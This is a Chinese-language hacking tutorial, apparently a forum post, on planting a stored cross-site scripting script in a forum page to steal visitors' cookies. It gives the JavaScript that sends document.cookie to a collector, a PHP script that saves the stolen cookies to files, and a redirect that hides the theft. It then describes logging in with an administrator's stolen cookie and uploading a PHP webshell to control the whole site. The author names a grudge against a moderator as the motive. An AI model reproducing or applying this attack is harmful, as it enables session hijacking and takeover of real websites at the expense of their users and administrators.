论坛——>入侵者布置的跨站攻击——>转移被入侵这视线(隐蔽)

论坛插入脚本：

var img = new Image();

img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);

但是我不一样，因为他需要诱导人去点击他的链接，但是现在人不是傻子，不会轻易点你的链接。而我是要把脚步插入论坛页面中，这样既隐蔽又省去了诱导的力气

我插入的脚本如下：

**********************************************************************************************

**********************************************************************************************

跨站攻击脚本：

reg.php

************************************************************************************

if (isset($_GET['var'])) {

file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));

}

?>

//转移页面隐蔽上面记录cookie的操作

************************************************************************************

剩下的步骤就是等着鱼自己上钩了

当管理员帐号点入论坛某个页面时，这个页面却被转到了某新闻网站，其实不知，他的cookie已经被记录

拿这个cookie登录论坛，(删东西不推荐哦~~)，可以临时开启上传php文件，例如phpwebshell，然后再关闭，这样你就可以很轻松的操控整个论坛站点

为什么选择此论坛做入侵讲解，很简单，这个论坛具备了多个漏洞：

一、论坛有XSS漏洞，没有对输入输出做过滤

二、论坛采用cookie方式记录用户信息

三、对论坛上某个版主看不惯，有点权利乱封号，不过，毕竟论坛不是那个人的，还是对管理员手下留情吧(做人要厚道！)